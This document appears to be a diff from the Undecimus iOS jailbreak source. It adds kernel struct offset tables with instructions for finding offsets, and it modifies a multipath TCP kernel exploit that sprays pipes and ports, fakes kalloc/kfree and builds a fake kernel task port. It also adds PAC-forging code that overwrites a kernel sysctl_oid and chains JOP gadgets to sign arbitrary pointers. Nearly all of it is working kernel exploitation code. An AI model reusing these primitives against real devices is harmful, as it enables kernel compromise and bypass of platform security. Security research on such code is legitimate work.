+            'ldr x0, [x0, #offset]
+        */
+        uint32_t task_vm_map;
+        
+        /*
+            nm kernel | grep '_get_bsdtask_info'
+            'ld rx0, [x0, #offset]
+        */
+        uint32_t task_bsd_info;
+
+        /*
+            joker -m kernel | grep 'task_self_trap'
+            go into 'bl' call
+            near the start of the func, just after _lck_mtx_lock,
+            it will load two values from a reg and compare them
+            one is later loaded into x0, this is the one you *dont'* want 
+            you need the offset of the one which *isn't* later loaded into x0
+            ldr xN, [xN, #offset]
+            image: https://i.imgur.com/RlauIez.png
+        */
+        uint32_t task_itk_self;
+
+        /*
+            joker -m kernel | grep mach_ports_lookup
+            about 1/3rd the way into the func it will load a value from a reg,
+            call a function, and store the return value, 3 times in a row
+            it will load from 3 offsets such as 0x2F0, 0x2F8, and 0x300 (notice they are all contiguous)
+            the lowest of the three offsets is the one you want 
+            image: https://i.imgur.com/0M1mUSM.png
+            (note the repeating pattern of 'ldr x0, [x20, #offset]', 'bl identical_func', 'str x0, [x21 #off]')
+        */
+        uint32_t task_itk_registered;
+
+        /*
+            joker -m kernel | grep 'task_info'
+            about halfway down the func, just before a _task_deallocate call, it will
+            load reg x0-x3, and then call a func 
+            within that func there is a jumptable, you need to find case 17 (TASK_DYLD_INFO)
+            in here it will do two loads and stores, the first load is your _image_info_addr offset,
+            the second is your _image_info_size offset (however this should be the _info_addr offset +0x8)
+            image: https://i.imgur.com/WpG6Ub6.png
+        */
+        uint32_t task_all_image_info_addr;
+        uint32_t task_all_image_info_size;
+    } struct_offsets;
+
+    struct {
+        /* 
+            if IOSurface::create_surface fails, this offset being wrong is why 
+            you can find the offset manually, but it's usually either 
+            0x6c8 for 11.0.x, 0xbc8 for 11.1.x-11.4.x, or 0xdd0 for 12.x
+        */
+        uint32_t create_outsize;
+
+        /* 
+            iometa -Csov IOUserClient kernel | grep 'getExternalTrapForIndex'
+            take the index (usually 0x5b8) and divide by 0x8
+        */
+        uint32_t get_external_trap_for_index;
+    } iosurface;
+} machswap_offsets_t;
+
+machswap_offsets_t *get_machswap_offsets(void);
+
+#endif

Undecimus/source/machswap_offsets.m

@@ -0,0 +1,154 @@
+#include <errno.h>
+#include <string.h>             // strcmp, strerror
+#include <sys/utsname.h>        // uname
+
+#include "common.h"             // LOG, kptr_t
+#include "machswap_offsets.h"
+
+static machswap_offsets_t *machswap_offsets[] =
+{
+    &(machswap_offsets_t)
+    {
+        .constant =
+        {
+            .release = "18.",
+            .cpu_subtype = CPU_SUBTYPE_ARM64E,
+            .kernel_image_base = 0xfffffff007004000,
+        },
+        .struct_offsets =
+        {
+            .proc_pid = 0x60,
+            .proc_task = 0x10,
+            .proc_ucred = 0xf8,
+            .task_vm_map = 0x20,
+            .task_bsd_info = 0x368,
+            .task_itk_self = 0xd8,
+            .task_itk_registered = 0x2e8,
+            .task_all_image_info_addr = 0x3a8,
+            .task_all_image_info_size = 0x3b0,
+        },
+        .iosurface =
+        {
+            .create_outsize = 0xdd0,
+            .get_external_trap_for_index = 0xb7,
+        },
+    },
+    &(machswap_offsets_t)
+    {
+        .constant =
+        {
+            .release = "18.",
+            .cpu_subtype = CPU_SUBTYPE_ARM64_V8,
+            .kernel_image_base = 0xfffffff007004000,
+        },
+        .struct_offsets =
+        {
+            .proc_pid = 0x60,
+            .proc_task = 0x10,
+            .proc_ucred = 0xf8,
+            .task_vm_map = 0x20,
+            .task_bsd_info = 0x358,
+            .task_itk_self = 0xd8,
+            .task_itk_registered = 0x2e8,
+            .task_all_image_info_addr = 0x398,
+            .task_all_image_info_size = 0x3a0,
+        },
+        .iosurface =
+        {
+            .create_outsize = 0xdd0,
+            .get_external_trap_for_index = 0xb7,
+        },
+    },
+    &(machswap_offsets_t)
+    {
+        .constant =
+        {
+            .release = "17.",
+            .cpu_subtype = CPU_SUBTYPE_ARM_ALL,
+            .kernel_image_base = 0xfffffff007004000,
+        },
+        .struct_offsets =
+        {
+            .proc_pid = 0x10,
+            .proc_task = 0x18,
+            .proc_ucred = 0x100,
+            .task_vm_map = 0x20,
+            .task_bsd_info = 0x368,
+            .task_itk_self = 0xd8,
+            .task_itk_registered = 0x2f0,
+            .task_all_image_info_addr = 0x3a8,
+            .task_all_image_info_size = 0x3b0,
+        },
+        .iosurface = 
+        {
+            .create_outsize = 0xbc8,
+            .get_external_trap_for_index = 0xb7,
+        },
+    },
+    NULL,
+};
+
+#include <sys/types.h>
+#include <sys/sysctl.h>
+#include <mach/machine.h>
+
+machswap_offsets_t *get_machswap_offsets(void)
+{
+    size_t size;
+    cpu_type_t cpu_type;
+    size = sizeof(cpu_type_t);
+    if (sysctlbyname("hw.cputype", &cpu_type, &size, NULL, 0) == -1) {
+        LOG("hw.cputype: %s", strerror(errno));
+        return NULL;
+    }
+
+    cpu_subtype_t cpu_subtype;
+    size = sizeof(cpu_subtype_t);
+    if (sysctlbyname("hw.cpusubtype", &cpu_subtype, &size, NULL, 0) == -1) {
+        LOG("hw.cpusubtype: %s", strerror(errno));
+        return NULL;
+    }
+
+    int ctl[2];
+    ctl[0] = CTL_KERN;
+    ctl[1] = KERN_OSRELEASE;
+
+    if (sysctl(ctl, 2, NULL, &size, NULL, 0) == -1 && errno != ENOMEM) {
+        LOG("kern.osrelease: %s", strerror(errno));
+        return NULL;
+    }
+
+    char release[size];
+    if (sysctl(ctl, 2, release, &size, NULL, 0) == -1) {
+        LOG("kern.osrelease: %s", strerror(errno));
+        return NULL;
+    }
+
+
+    for (size_t i = 0; machswap_offsets[i] != 0; ++i)
+    {
+        if (strncmp(machswap_offsets[i]->constant.release, release, strlen(machswap_offsets[i]->constant.release)) == 0)
+        {
+            if (machswap_offsets[i]->constant.cpu_subtype == cpu_subtype ||
+                machswap_offsets[i]->constant.cpu_subtype == CPU_SUBTYPE_ARM_ALL) {
+                return machswap_offsets[i];
+            }
+        }
+    }
+
+    ctl[1] = KERN_VERSION;
+    
+    if (sysctl(ctl, 2, NULL, &size, NULL, 0) == -1 && errno != ENOMEM) {
+        LOG("kern.version: %s", strerror(errno));
+        return NULL;
+    }
+
+    char version[size];
+    if (sysctl(ctl, 2, version, &size, NULL, 0) == -1) {
+        LOG("kern.version: %s", strerror(errno));
+        return NULL;
+    }
+
+    LOG("Failed to get offsets for kernel version: %s", version);
+    return NULL;
+}

Undecimus/source/machswap_pwn.h

@@ -0,0 +1,11 @@
+#ifndef MACHSWAP_PWN_H
+#define MACHSWAP_PWN_H
+
+#include <mach/mach.h>
+
+#include "common.h"
+#include "machswap_offsets.h"
+
+kern_return_t machswap_exploit(machswap_offsets_t *offsets);
+
+#endif

Undecimus/source/multi_path_sploit.c

@@ -14,7 +14,7 @@
 #include <pthread.h>
 
 #include "KernelMemory.h"
-#include "KernelStructureOffsets.h"
+#include "KernelOffsets.h"
 #include "KernelUtilities.h"
 #include <common.h>
 
@@ -38,7 +38,7 @@ kern_return_t mach_vm_read_overwrite(
     mach_vm_address_t data,
     mach_vm_size_t* outsize);
 
-void increase_limits()
+static void increase_limits()
 {
     struct rlimit lim = { 0 };
     int err = getrlimit(RLIMIT_NOFILE, &lim);
@@ -66,7 +66,7 @@ void increase_limits()
 }
 
 #define AF_MULTIPATH 39
-int alloc_mptcp_socket()
+static int alloc_mptcp_socket()
 {
     int sock = socket(AF_MULTIPATH, SOCK_STREAM, 0);
     if (sock < 0) {
@@ -77,7 +77,7 @@ int alloc_mptcp_socket()
     return sock;
 }
 
-void do_partial_kfree_with_socket(int fd, uint64_t kaddr, uint32_t n_bytes)
+static void do_partial_kfree_with_socket(int fd, uint64_t kaddr, uint32_t n_bytes)
 {
     struct sockaddr* sockaddr_src = malloc(256);
     memset(sockaddr_src, 'D', 256);
@@ -116,15 +116,15 @@ void do_partial_kfree_with_socket(int fd, uint64_t kaddr, uint32_t n_bytes)
     return;
 }
 
-char* aaaas = NULL;
+static char* aaaas = NULL;
 
-int read_fds[10000] = { 0 };
-int write_fds[10000] = { 0 };
-int next_read_fd = 0;
+static int read_fds[10000] = { 0 };
+static int write_fds[10000] = { 0 };
+static int next_read_fd = 0;
 
 #define PIPE_SIZE 0x7ff
 
-int alloc_and_fill_pipe()
+static int alloc_and_fill_pipe()
 {
     int fds[2] = { 0 };
     int err = pipe(fds);
@@ -155,7 +155,7 @@ int alloc_and_fill_pipe()
     return read_end; // the buffer is actually hanging off the read end struct pipe
 }
 
-int find_replacer_pipe(void** contents)
+static int find_replacer_pipe(void** contents)
 {
     uint64_t* read_back = malloc(PIPE_SIZE);
     for (int i = 0; i < next_read_fd; i++) {
@@ -183,7 +183,7 @@ int find_replacer_pipe(void** contents)
     return -1;
 }
 
-mach_port_t fake_kalloc(int size)
+static mach_port_t fake_kalloc(int size)
 {
     mach_port_t port = MACH_PORT_NULL;
     kern_return_t err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
@@ -221,7 +221,7 @@ mach_port_t fake_kalloc(int size)
     return port;
 }
 
-void fake_kfree(mach_port_t port)
+static void fake_kfree(mach_port_t port)
 {
     mach_port_destroy(mach_task_self(), port);
 }
@@ -276,7 +276,7 @@ static void build_fake_task_port(uint8_t* fake_port, uint64_t fake_port_kaddr, u
  */
 
 // size is desired kalloc size for message
-mach_port_t prealloc_port(natural_t size)
+static mach_port_t prealloc_port(natural_t size)
 {
     kern_return_t err;
     mach_port_qos_t qos = { 0 };
@@ -299,9 +299,9 @@ mach_port_t prealloc_port(natural_t size)
     return (mach_port_t)name;
 }
 
-mach_port_t extracted_thread_port = MACH_PORT_NULL;
+static mach_port_t extracted_thread_port = MACH_PORT_NULL;
 
-kern_return_t catch_exception_raise_state_identity(
+static kern_return_t catch_exception_raise_state_identity(
     mach_port_t exception_port,
     mach_port_t thread,
     mach_port_t task,
@@ -329,7 +329,11 @@ kern_return_t catch_exception_raise_state_identity(
 
     *new_stateCnt = old_stateCnt;
 
+#if __DARWIN_OPAQUE_ARM_THREAD_STATE64
+    new->__opaque_pc = (uint64_t)pthread_exit;
+#else
     new->__pc = (uint64_t)pthread_exit;
+#endif
     new->__x[0] = 0;
 
     // let the thread resume and exit
@@ -343,24 +347,28 @@ union max_msg {
 
 extern boolean_t exc_server(mach_msg_header_t* InHeadP, mach_msg_header_t* OutHeadP);
 
-void* do_thread(void* arg)
+static void* do_thread(void* arg)
 {
     mach_port_t exception_port = (mach_port_t)arg;
 
     kern_return_t err;
+    thread_t thread = mach_thread_self();
     err = thread_set_exception_ports(
-        mach_thread_self(),
+        thread,
         EXC_MASK_ALL,
         exception_port,
         EXCEPTION_STATE_IDENTITY, // catch_exception_raise_state_identity messages
         ARM_THREAD_STATE64);
-
+    mach_port_deallocate(mach_task_self(), thread);
+    
     if (err != KERN_SUCCESS) {
         LOG("failed to set exception port");
     }
 
     // make the thread port which gets sent in the message actually be the host port
-    err = thread_set_special_port(mach_thread_self(), THREAD_KERNEL_PORT, mach_host_self());
+    host_t host = mach_host_self();
+    err = thread_set_special_port(host, THREAD_KERNEL_PORT, host);
+    mach_port_deallocate(mach_task_self(), host);
     if (err != KERN_SUCCESS) {
         LOG("failed to set THREAD_KERNEL_PORT");
     }
@@ -372,12 +380,12 @@ void* do_thread(void* arg)
     return NULL;
 }
 
-void prepare_prealloc_port(mach_port_t port)
+static void prepare_prealloc_port(mach_port_t port)
 {
     mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
 }
 
-int port_has_message(mach_port_t port)
+static int port_has_message(mach_port_t port)
 {
     kern_return_t err;
     mach_port_seqno_t msg_seqno = 0;
@@ -398,7 +406,7 @@ int port_has_message(mach_port_t port)
 }
 
 // we need a send right for port
-void send_prealloc_msg(mach_port_t port)
+static void send_prealloc_msg(mach_port_t port)
 {
     // start a new thread passing it the buffer and the exception port
     pthread_t t;
@@ -420,7 +428,7 @@ void send_prealloc_msg(mach_port_t port)
 
 // receive the exception message on the port and extract the thread port
 // which we will have overwritten with a pointer to the initial kernel r/w port
-mach_port_t receive_prealloc_msg(mach_port_t port)
+static mach_port_t receive_prealloc_msg(mach_port_t port)
 {
     kern_return_t err = mach_msg_server_once(exc_server,
         sizeof(union max_msg),
@@ -437,9 +445,9 @@ mach_port_t receive_prealloc_msg(mach_port_t port)
     return extracted_thread_port;
 }
 
-uint64_t early_read_pipe_buffer_kaddr;
-int early_read_pipe_read_end;
-int early_read_pipe_write_end;
+static uint64_t early_read_pipe_buffer_kaddr;
+static int early_read_pipe_read_end;
+static int early_read_pipe_write_end;
 static mach_port_t early_read_port;
 
 static mach_port_t prepare_early_read_primitive(uint64_t pipe_buffer_kaddr, int pipe_read_end, int pipe_write_end, mach_port_t replacer_port, uint8_t* original_contents)
@@ -495,7 +503,7 @@ static uint32_t early_rk32(uint64_t kaddr)
         LOG("pid_for_task returned %x", err);
     }
     LOG("read val via pid_for_task: %08x", val);
-    free(pipe_contents);
+    SafeFreeNULL(pipe_contents);
     return val;
 }
 
@@ -509,7 +517,7 @@ static uint64_t early_rk64(uint64_t kaddr)
 
 // yes, this isn't the real kernel task port
 // but you can modify the exploit easily to give you that if you want it!
-mach_port_t prepare_tfp0(uint64_t vm_map, uint64_t receiver)
+static mach_port_t prepare_tfp0(uint64_t vm_map, uint64_t receiver)
 {
     uint8_t* pipe_contents = malloc(PIPE_SIZE);
     ssize_t amount = read(early_read_pipe_read_end, pipe_contents, PIPE_SIZE);
@@ -525,7 +533,7 @@ mach_port_t prepare_tfp0(uint64_t vm_map, uint64_t receiver)
     // replace the ipc_kmsg:
     write(early_read_pipe_write_end, pipe_contents, PIPE_SIZE);
 
-    free(pipe_contents);
+    SafeFreeNULL(pipe_contents);
 
     // early_read_port is no longer only capable of reads!
     return early_read_port;

Undecimus/source/pac.c

@@ -0,0 +1,272 @@
+/*
+ * kernel_call/pac.c
+ * Brandon Azad
+ */
+#include "pac.h"
+
+#include "kernel_call.h"
+#include "kc_parameters.h"
+#include "user_client.h"
+#include "kernel_memory.h"
+#include "log.h"
+#include "mach_vm.h"
+#include "parameters.h"
+
+#if __arm64e__
+
+// ---- Global variables --------------------------------------------------------------------------
+
+// The address of our kernel buffer.
+static uint64_t kernel_pacxa_buffer;
+
+// The forged value PACIZA('mov x0, x4 ; br x5').
+static uint64_t paciza__mov_x0_x4__br_x5;
+
+// ---- Stage 2 -----------------------------------------------------------------------------------
+
+/*
+ * stage1_kernel_call_7
+ *
+ * Description:
+ * 	Call a kernel function using our stage 1 execute primitive with explicit registers.
+ *
+ * 	See stage1_kernel_call_7v.
+ */
+static uint32_t
+stage1_kernel_call_7(uint64_t function, uint64_t x1, uint64_t x2, uint64_t x3,
+		uint64_t x4, uint64_t x5, uint64_t x6) {
+	uint64_t arguments[7] = { 1, x1, x2, x3, x4, x5, x6 };
+	return stage1_kernel_call_7v(function, 7, arguments);
+}
+
+/*
+ * stage1_init_kernel_pacxa_forging
+ *
+ * Description:
+ * 	Initialize our stage 1 capability to forge PACIA and PACDA pointers.
+ */
+static void
+stage1_init_kernel_pacxa_forging() {
+	// Get the authorized pointers to l2tp_domain_module_start() and l2tp_domain_module_stop().
+	// Because these values already contain the PACIZA code, we can call them with the stage 0
+	// call primitive to start/stop the module.
+	uint64_t paciza__l2tp_domain_module_start = kernel_read64(
+			ADDRESS(paciza_pointer__l2tp_domain_module_start));
+	uint64_t paciza__l2tp_domain_module_stop = kernel_read64(
+			ADDRESS(paciza_pointer__l2tp_domain_module_stop));
+
+	// Read out the original value of sysctl__net_ppp_l2tp__data.
+	uint8_t sysctl__net_ppp_l2tp__data[SIZE(sysctl_oid)];
+	kernel_read(ADDRESS(sysctl__net_ppp_l2tp), sysctl__net_ppp_l2tp__data, SIZE(sysctl_oid));
+
+	// Create a fake sysctl_oid for sysctl_unregister_oid(). We craft this sysctl_oid such that
+	// sysctl_unregister_oid() will execute the following instruction sequence:
+	//
+	// 	LDR         X10, [X9,#0x30]!		; X10 = old_oidp->oid_handler
+	// 	CBNZ        X19, loc_FFFFFFF007EBD330
+	// 	CBZ         X10, loc_FFFFFFF007EBD330
+	// 	MOV         X19, #0
+	// 	MOV         X11, X9			; X11 = &old_oidp->oid_handler
+	// 	MOVK        X11, #0x14EF,LSL#48		; X11 = 14EF`&oid_handler
+	// 	AUTIA       X10, X11			; X10 = AUTIA(handler, 14EF`&handler)
+	// 	PACIZA      X10				; X10 = PACIZA(X10)
+	// 	STR         X10, [X9]			; old_oidp->oid_handler = X10
+	//
+	uint8_t fake_sysctl_oid[SIZE(sysctl_oid)];
+	memset(fake_sysctl_oid, 0xab, SIZE(sysctl_oid));
+	FIELD(fake_sysctl_oid, sysctl_oid, oid_parent,  uint64_t) = ADDRESS(sysctl__net_ppp_l2tp) + OFFSET(sysctl_oid, oid_link);
+	FIELD(fake_sysctl_oid, sysctl_oid, oid_link,    uint64_t) = ADDRESS(sysctl__net_ppp_l2tp);
+	FIELD(fake_sysctl_oid, sysctl_oid, oid_kind,    uint32_t) = 0x400000;
+	FIELD(fake_sysctl_oid, sysctl_oid, oid_handler, uint64_t) = ADDRESS(mov_x0_x4__br_x5);
+	FIELD(fake_sysctl_oid, sysctl_oid, oid_version, uint32_t) = 1;
+	FIELD(fake_sysctl_oid, sysctl_oid, oid_refcnt,  uint32_t) = 0;
+
+	// Overwrite sysctl__net_ppp_l2tp with our fake sysctl_oid.
+	kernel_write(ADDRESS(sysctl__net_ppp_l2tp), fake_sysctl_oid, SIZE(sysctl_oid));
+
+	// Call l2tp_domain_module_stop() to trigger sysctl_unregister_oid() on our fake
+	// sysctl_oid, which will PACIZA our pointer to the "mov x0, x4 ; br x5" gadget.
+	__unused uint32_t ret;
+	ret = stage1_kernel_call_7(
+			paciza__l2tp_domain_module_stop,	// PC
+			0, 0, 0, 0, 0, 0);			// X1 - X6
+	DEBUG_TRACE(1, "%s(): 0x%08x; l2tp_domain_inited = %d",
+			"l2tp_domain_module_stop", ret,
+			kernel_read32(ADDRESS(l2tp_domain_inited)));
+
+	// Read back the PACIZA'd pointer to the 'mov x0, x4 ; br x5' gadget. This pointer will not
+	// be exactly correct, since it PACIZA'd an AUTIA'd pointer we didn't sign. But we can use
+	// this value to reconstruct the correct PACIZA'd pointer.
+	uint64_t handler = kernel_read64(
+			ADDRESS(sysctl__net_ppp_l2tp) + OFFSET(sysctl_oid, oid_handler));
+	paciza__mov_x0_x4__br_x5 = handler ^ (1uLL << (63 - 1));
+	DEBUG_TRACE(1, "PACIZA(%s) = 0x%016llx", "'mov x0, x4 ; br x5'", paciza__mov_x0_x4__br_x5);
+
+	// Now write back the original sysctl_oid and call sysctl_unregister_oid() to clean it up.
+	kernel_write(ADDRESS(sysctl__net_ppp_l2tp), sysctl__net_ppp_l2tp__data, SIZE(sysctl_oid));
+	ret = stage1_kernel_call_7(
+			paciza__mov_x0_x4__br_x5,	// PC
+			0, 0, 0,			// X1 - X3
+			ADDRESS(sysctl__net_ppp_l2tp),	// X4
+			ADDRESS(sysctl_unregister_oid),	// X5
+			0);				// X6
+	DEBUG_TRACE(2, "%s(%016llx) = 0x%08x", "sysctl_unregister_oid",
+			ADDRESS(sysctl__net_ppp_l2tp), ret);
+
+	// And finally call l2tp_domain_module_start() to re-initialize the module.
+	ret = stage1_kernel_call_7(
+			paciza__l2tp_domain_module_start,	// PC
+			0, 0, 0, 0, 0, 0);			// X1 - X6
+	DEBUG_TRACE(1, "%s(): 0x%08x; l2tp_domain_inited = %d",
+			"l2tp_domain_module_start", ret,
+			kernel_read32(ADDRESS(l2tp_domain_inited)));
+
+	// Alright, so now we have an arbitrary call gadget!
+	kernel_pacxa_buffer = stage1_get_kernel_buffer();
+}
+
+// ---- Stage 2 -----------------------------------------------------------------------------------
+
+/*
+ * stage2_kernel_forge_pacxa
+ *
+ * Description:
+ * 	Forge a PACIA or PACDA pointer using the kernel forging gadgets.
+ */
+static uint64_t
+stage2_kernel_forge_pacxa(uint64_t address, uint64_t context, bool instruction) {
+	const size_t pacxa_buffer_size   = SIZE(kernel_forge_pacxa_gadget_buffer);
+	const size_t pacxa_buffer_offset = OFFSET(kernel_forge_pacxa_gadget_buffer, first_access);
+	// Initialize the kernel_pacxa_buffer to be all zeros.
+	uint8_t pacxa_buffer[pacxa_buffer_size - pacxa_buffer_offset];
+	memset(pacxa_buffer, 0, sizeof(pacxa_buffer));
+	kernel_write(kernel_pacxa_buffer, pacxa_buffer, sizeof(pacxa_buffer));
+	// The buffer address we pass to the gadget is offset from the part of that we initialize
+	// (to save us some space). The result is stored at different offsets in the buffer
+	// depending on whether the operation is PACIA or PACDA.
+	uint64_t buffer_address = kernel_pacxa_buffer - pacxa_buffer_offset;
+	uint64_t result_address = buffer_address;
+	uint64_t pacxa_gadget;
+	if (instruction) {
+		result_address += OFFSET(kernel_forge_pacxa_gadget_buffer, pacia_result);
+		pacxa_gadget = ADDRESS(kernel_forge_pacia_gadget);
+	} else {
+		result_address += OFFSET(kernel_forge_pacxa_gadget_buffer, pacda_result);
+		pacxa_gadget = ADDRESS(kernel_forge_pacda_gadget);
+	}
+	// We need to set:
+	//
+	// 	x2  = buffer_address
+	// 	x9  = address
+	// 	x10 = context
+	//
+	// In order to do that we'll execute the following JOP sequence before jumping to the
+	// gadget:
+	//
+	// 	mov  x0, x4 ; br x5
+	// 	mov  x9, x0 ; br x1
+	// 	mov x10, x3 ; br x6
+	//
+	__unused uint32_t ret;
+	ret = stage1_kernel_call_7(
+			paciza__mov_x0_x4__br_x5,	// PC
+			ADDRESS(mov_x10_x3__br_x6),	// X1
+			buffer_address,			// X2
+			context,			// X3
+			address,			// X4
+			ADDRESS(mov_x9_x0__br_x1),	// X5
+			pacxa_gadget);			// X6
+	DEBUG_TRACE(2, "%s_GADGET(): 0x%08x", (instruction ? "PACIA" : "PACDA"), ret);
+	// Now recover the PACXA'd value.
+	uint64_t pacxa = kernel_read64(result_address);
+	return pacxa;
+}
+
+/*
+ * xpaci
+ *
+ * Description:
+ * 	Strip a PACIx code from a pointer.
+ */
+static uint64_t
+xpaci(uint64_t pointer) {
+	asm("xpaci %[value]\n" : [value] "+r"(pointer));
+	return pointer;
+}
+
+/*
+ * xpacd
+ *
+ * Description:
+ * 	Strip a PACDx code from a pointer.
+ */
+static uint64_t
+xpacd(uint64_t pointer) {
+	asm("xpacd %[value]\n" : [value] "+r"(pointer));
+	return pointer;
+}
+
+#endif // __arm64e__
+
+// ---- API ---------------------------------------------------------------------------------------
+
+bool
+stage2_kernel_call_init() {
+#if __arm64e__
+	stage1_init_kernel_pacxa_forging();
+#endif
+	return true;
+}
+
+void
+stage2_kernel_call_deinit() {
+}
+
+uint32_t
+stage2_kernel_call_7v(uint64_t function,
+		size_t argument_count, const uint64_t arguments[]) {
+	uint64_t paciza_function = kernel_forge_pacia(function, 0);
+	return stage1_kernel_call_7v(paciza_function, argument_count, arguments);
+}
+
+uint64_t
+kernel_forge_pacia(uint64_t pointer, uint64_t context) {
+#if __arm64e__
+	return stage2_kernel_forge_pacxa(pointer, context, true);
+#else
+	return pointer;
+#endif
+}
+
+uint64_t
+kernel_forge_pacia_with_type(uint64_t pointer, uint64_t address, uint16_t type) {
+	uint64_t context = ((uint64_t) type << 48) | (address & 0x0000ffffffffffff);
+	return kernel_forge_pacia(pointer, context);
+}
+
+uint64_t
+kernel_forge_pacda(uint64_t pointer, uint64_t context) {
+#if __arm64e__
+	return stage2_kernel_forge_pacxa(pointer, context, false);
+#else
+	return pointer;
+#endif
+}
+
+uint64_t
+kernel_xpaci(uint64_t pointer) {
+#if __arm64e__
+	return xpaci(pointer);
+#else
+	return pointer;
+#endif
+}
+
+uint64_t
+kernel_xpacd(uint64_t pointer) {
+#if __arm64e__
+	return xpacd(pointer);
+#else
+	return pointer;
+#endif
+}

Undecimus/source/pac.h

@@ -0,0 +1,48 @@
+/*
+ * kernel_call/pac.h
+ * Brandon Azad
+ */
+#ifndef VOUCHER_SWAP__KERNEL_CALL__PAC_H_
+#define VOUCHER_SWAP__KERNEL_CALL__PAC_H_
+
+#include <stdbool.h>
+#include <stddef.h>
+#include <stdint.h>
+
+/*
+ * stage2_kernel_call_init
+ *
+ * Description:
+ * 	Initialize stage 2 of kernel function calling.
+ *
+ * Initializes:
+ * 	stage2_kernel_call_7v()
+ * 	kernel_forge_pacia()
+ * 	kernel_forge_pacia_with_type()
+ * 	kernel_forge_pacda()
+ */
+bool stage2_kernel_call_init(void);
+
+/*
+ * stage2_kernel_call_deinit
+ *
+ * Description:
+ * 	Deinitialize stage 2 of kernel function calling.
+ */
+void stage2_kernel_call_deinit(void);
+
+/*
+ * stage2_kernel_call_7v
+ *
+ * Description:
+ * 	Call a kernel function using our stage 2 execute primitive.
+ *
+ * Restrictions:
+ * 	At most 7 arguments can be passed.
+ * 	The return value is truncated to 32 bits.
+ * 	At stage 2, only arguments X1 - X6 are controlled.
+ */
+uint32_t stage2_kernel_call_7v(uint64_t function,
+		size_t argument_count, const uint64_t arguments[]);
+
+#endif

Undecimus/source/parameters.c

@@ -70,7 +70,7 @@ offsets__iphone11_8__16C50() {
 	OFFSET(ipc_entry, ie_request) = 16;
 
 	SIZE(ipc_port)                  =   0xa8;
-	BLOCK_SIZE(ipc_port)            = page_size;
+	BLOCK_SIZE(ipc_port)            = 0x4000;
 	OFFSET(ipc_port, ip_bits)       =   0;
 	OFFSET(ipc_port, ip_references) =   4;
 	OFFSET(ipc_port, waitq_flags)   =  24;
@@ -91,7 +91,7 @@ offsets__iphone11_8__16C50() {
 	OFFSET(ipc_space, is_table)      = 0x20;
 
 	SIZE(ipc_voucher)       =   0x50;
-	BLOCK_SIZE(ipc_voucher) = page_size;
+	BLOCK_SIZE(ipc_voucher) = 0x4000;
 
 	OFFSET(proc, p_pid)   = 0x60;
 	OFFSET(proc, p_ucred) = 0xf8;
@@ -129,7 +129,7 @@ offsets__iphone9_3__15E302() {
     OFFSET(ipc_entry, ie_request) = 16;
     
     SIZE(ipc_port)                  =   0xa8;
-    BLOCK_SIZE(ipc_port)            = page_size;
+    BLOCK_SIZE(ipc_port)            = 0x4000;
     OFFSET(ipc_port, ip_bits)       =   0;
     OFFSET(ipc_port, ip_references) =   4;
     OFFSET(ipc_port, waitq_flags)   =  24;
@@ -150,7 +150,7 @@ offsets__iphone9_3__15E302() {
     OFFSET(ipc_space, is_table)      = 0x20;
     
     SIZE(ipc_voucher)       =   0x50;
-    BLOCK_SIZE(ipc_voucher) = page_size;
+    BLOCK_SIZE(ipc_voucher) = 0x4000;
     
     OFFSET(proc, p_pid)   = 0x10;
     OFFSET(proc, p_ucred) = 0x100;
@@ -180,10 +180,10 @@ initialize_computed_offsets() {
 
 // A list of offset initializations by platform.
 static struct initialization offsets[] = {
-	{ "iPhone11,*", "16C50-16C104", offsets__iphone11_8__16C50  },
-	{ "iPhone10,1", "16B92-16C101", offsets__iphone10_1__16B92  },
-    { "*", "16A366-16D5024a", offsets__iphone10_1__16B92  },
     { "*", "15A5278f-15G77", offsets__iphone9_3__15E302 },
+    { "*", "16A366-16D5024a", offsets__iphone10_1__16B92  },
+	{ "iPhone11,*", "16A366-16D5024a", offsets__iphone11_8__16C50  },
+    { "iPad8,*", "16A366-16D5024a", offsets__iphone11_8__16C50  },
 	{ "*",          "*",            initialize_computed_offsets },
 };
 

Undecimus/source/prefs.h

@@ -0,0 +1,70 @@
+//
+//  prefs.h
+//  Undecimus
+//
+//  Created by Pwn20wnd on 5/3/19.
+//  Copyright © 2019 Pwn20wnd. All rights reserved.
+//
+
+#ifndef prefs_h
+#define prefs_h
+
+#include <stdio.h>
+#include <stdbool.h>
+
+#define K_TWEAK_INJECTION          "TweakInjection"
+#define K_LOAD_DAEMONS             "LoadDaemons"
+#define K_DUMP_APTICKET            "DumpAPTicket"
+#define K_REFRESH_ICON_CACHE       "RefreshIconCache"
+#define K_BOOT_NONCE               "BootNonce"
+#define K_EXPLOIT                  "Exploit"
+#define K_DISABLE_AUTO_UPDATES     "DisableAutoUpdates"
+#define K_DISABLE_APP_REVOKES      "DisableAppRevokes"
+#define K_OVERWRITE_BOOT_NONCE     "OverwriteBootNonce"
+#define K_EXPORT_KERNEL_TASK_PORT  "ExportKernelTaskPort"
+#define K_RESTORE_ROOTFS           "RestoreRootFS"
+#define K_INCREASE_MEMORY_LIMIT    "IncreaseMemoryLimit"
+#define K_ECID                     "Ecid"
+#define K_INSTALL_OPENSSH          "InstallOpenSSH"
+#define K_INSTALL_CYDIA            "InstallCydia"
+#define K_RELOAD_SYSTEM_DAEMONS    "ReloadSystemDaemons"
+#define K_HIDE_LOG_WINDOW          "HideLogWindow"
+#define K_RESET_CYDIA_CACHE        "ResetCydiaCache"
+#define K_SSH_ONLY                 "SSHOnly"
+#define K_ENABLE_GET_TASK_ALLOW    "EnableGetTaskAllow"
+#define K_SET_CS_DEBUGGED          "SetCSDebugged"
+
+typedef struct {
+    bool load_tweaks;
+    bool load_daemons;
+    bool dump_apticket;
+    bool run_uicache;
+    const char *boot_nonce;
+    bool disable_auto_updates;
+    bool disable_app_revokes;
+    bool overwrite_boot_nonce;
+    bool export_kernel_task_port;
+    bool restore_rootfs;
+    bool increase_memory_limit;
+    const char *ecid;
+    bool install_cydia;
+    bool install_openssh;
+    bool reload_system_daemons;
+    bool reset_cydia_cache;
+    bool ssh_only;
+    bool enable_get_task_allow;
+    bool set_cs_debugged;
+    bool hide_log_window;
+    int exploit;
+} prefs_t;
+
+prefs_t *new_prefs(void);
+prefs_t *copy_prefs(void);
+void release_prefs(prefs_t **prefs);
+bool load_prefs(prefs_t *prefs);
+bool set_prefs(prefs_t *prefs);
+void register_default_prefs(void);
+void repair_prefs(void);
+void reset_prefs(void);
+
+#endif /* prefs_h */

Undecimus/source/prefs.m

@@ -0,0 +1,135 @@
+//
+//  prefs.c
+//  Undecimus
+//
